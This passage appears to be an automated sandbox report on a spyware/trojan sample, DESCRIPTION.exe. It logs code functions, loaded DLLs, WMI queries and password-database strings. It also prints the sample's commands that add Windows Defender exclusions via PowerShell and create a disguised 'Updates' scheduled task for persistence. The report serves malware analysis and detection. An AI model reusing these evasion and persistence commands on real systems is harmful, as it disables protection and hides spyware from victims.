Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_04B77F38	1_2_04B77F38
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_04B77F28	1_2_04B77F28
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_0699D238	1_2_0699D238
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_0699DD78	1_2_0699DD78
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_0699DCEA	1_2_0699DCEA
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_0699ED20	1_2_0699ED20
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_0699E8D8	1_2_0699E8D8
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C3768	1_2_069C3768
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C5201	1_2_069C5201
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C0040	1_2_069C0040
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C5AB0	1_2_069C5AB0
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C3B98	1_2_069C3B98
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C3758	1_2_069C3758
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C4590	1_2_069C4590
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C4580	1_2_069C4580
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069CD510	1_2_069CD510
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C3570	1_2_069C3570
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C3562	1_2_069C3562
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C32F8	1_2_069C32F8
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C32E8	1_2_069C32E8
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C6099	1_2_069C6099
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069CD0B8	1_2_069CD0B8
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C30D8	1_2_069C30D8
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069CD0D8	1_2_069CD0D8
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C30C8	1_2_069C30C8
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C4138	1_2_069C4138
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C4148	1_2_069C4148
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C1E98	1_2_069C1E98
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C1E88	1_2_069C1E88
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C3DF0	1_2_069C3DF0
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C3DE0	1_2_069C3DE0
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069CED50	1_2_069CED50
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069CFAFA	1_2_069CFAFA
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C2A48	1_2_069C2A48
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C4A41	1_2_069C4A41
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069C2A42	1_2_069C2A42
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069CFB08	1_2_069CFB08
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Code function: 1_2_069CD948	1_2_069CD948
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_01144204	10_2_01144204
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_011425D8	10_2_011425D8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0114E704	10_2_0114E704
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_01147088	10_2_01147088
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561D248	10_2_0561D248
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561DD78	10_2_0561DD78
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561D238	10_2_0561D238
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561ED20	10_2_0561ED20
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561ED30	10_2_0561ED30
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561DCD8	10_2_0561DCD8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561E8E8	10_2_0561E8E8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_0561E8D8	10_2_0561E8D8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F33768	10_2_06F33768
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F35210	10_2_06F35210
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F30040	10_2_06F30040
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F35AC0	10_2_06F35AC0
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F33BA8	10_2_06F33BA8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F33758	10_2_06F33758
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F34590	10_2_06F34590
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F34580	10_2_06F34580
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F33570	10_2_06F33570
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F33561	10_2_06F33561
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F3D510	10_2_06F3D510
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F332F8	10_2_06F332F8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F332E8	10_2_06F332E8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F35201	10_2_06F35201
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F3D0D8	10_2_06F3D0D8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F330D8	10_2_06F330D8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F330C8	10_2_06F330C8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F3D0B8	10_2_06F3D0B8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F360A8	10_2_06F360A8
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F36099	10_2_06F36099
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F30006	10_2_06F30006
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F34148	10_2_06F34148
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F34138	10_2_06F34138
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F31E98	10_2_06F31E98
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F31E88	10_2_06F31E88
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F33DF0	10_2_06F33DF0
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F33DE0	10_2_06F33DE0
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F3ED50	10_2_06F3ED50
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F3FAFA	10_2_06F3FAFA
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F35AB0	10_2_06F35AB0
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F34A50	10_2_06F34A50
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F34A41	10_2_06F34A41
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F32A46	10_2_06F32A46
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F32A48	10_2_06F32A48
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F33B98	10_2_06F33B98
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F3FB08	10_2_06F3FB08
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Code function: 10_2_06F3D948	10_2_06F3D948

Source: DESCRIPTION.exe, 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamedevourment.exe vs DESCRIPTION.exe
Source: DESCRIPTION.exe, 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs DESCRIPTION.exe
Source: DESCRIPTION.exe, 00000001.00000002.1518760161.00000000068EF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamejoip.exe< vs DESCRIPTION.exe
Source: DESCRIPTION.exe, 00000001.00000000.1459726578.00000000001CE000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamejoip.exe< vs DESCRIPTION.exe
Source: DESCRIPTION.exe, 00000001.00000002.1518561386.0000000006860000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameCaptive.dll" vs DESCRIPTION.exe
Source: DESCRIPTION.exe, 00000001.00000002.1520866419.000000000AD50000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs DESCRIPTION.exe
Source: DESCRIPTION.exe, 00000001.00000002.1498425267.000000000068E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs DESCRIPTION.exe
Source: DESCRIPTION.exe	Binary or memory string: OriginalFilenamejoip.exe< vs DESCRIPTION.exe

Source: DESCRIPTION.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DESCRIPTION.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: OdoiXyuXnaQN.exe.1.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DESCRIPTION.exe, 00000009.00000002.2715154991.0000000000448000.00000040.00000400.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, 00000010.00000002.2715156422.0000000000442000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: (K@*\AC:\Users\ik\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: OdoiXyuXnaQN.exe	Binary or memory string: *\AC:\Users\ik\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp
Source: DESCRIPTION.exe, 00000001.00000002.1501721613.0000000003CF2000.00000004.00000800.00020000.00000000.sdmp, OdoiXyuXnaQN.exe, OdoiXyuXnaQN.exe, 00000010.00000002.2715156422.0000000000403000.00000040.00000400.00020000.00000000.sdmp	Binary or memory string: D*\AC:\Users\ik\AppData\Roaming\Microsoft\Windows\Templates\Stub\Project1.vbp

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@23/69@0/2

Source: C:\Users\user\Desktop\DESCRIPTION.exe

File created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe

Jump to behavior

Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5992:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2056:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6700:120:WilError_03

Source: C:\Users\user\Desktop\DESCRIPTION.exe

File created: C:\Users\user\AppData\Local\Temp\tmp9A10.tmp

Jump to behavior

Source: DESCRIPTION.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: DESCRIPTION.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Users\user\Desktop\DESCRIPTION.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\DESCRIPTION.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\DESCRIPTION.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: OdoiXyuXnaQN.exe	Binary or memory string: SELECT item1 FROM metadata WHERE id = 'password';
Source: LogfisslehbQlYkgroFYogLHXZKSUzhGekoogWGBPjtfAuuepjaXbgfishfall.9.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: DESCRIPTION.exe	Virustotal: Detection: 33%
Source: DESCRIPTION.exe	ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\DESCRIPTION.exe

File read: C:\Users\user\Desktop\DESCRIPTION.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\DESCRIPTION.exe "C:\Users\user\Desktop\DESCRIPTION.exe"
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Users\user\Desktop\DESCRIPTION.exe "C:\Users\user\Desktop\DESCRIPTION.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\DESCRIPTION.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmp9A10.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Process created: C:\Users\user\Desktop\DESCRIPTION.exe "C:\Users\user\Desktop\DESCRIPTION.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\OdoiXyuXnaQN" /XML "C:\Users\user\AppData\Local\Temp\tmpAB27.tmp"
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"
Source: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe	Process created: C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe "C:\Users\user\AppData\Roaming\OdoiXyuXnaQN.exe"

Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\DESCRIPTION.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
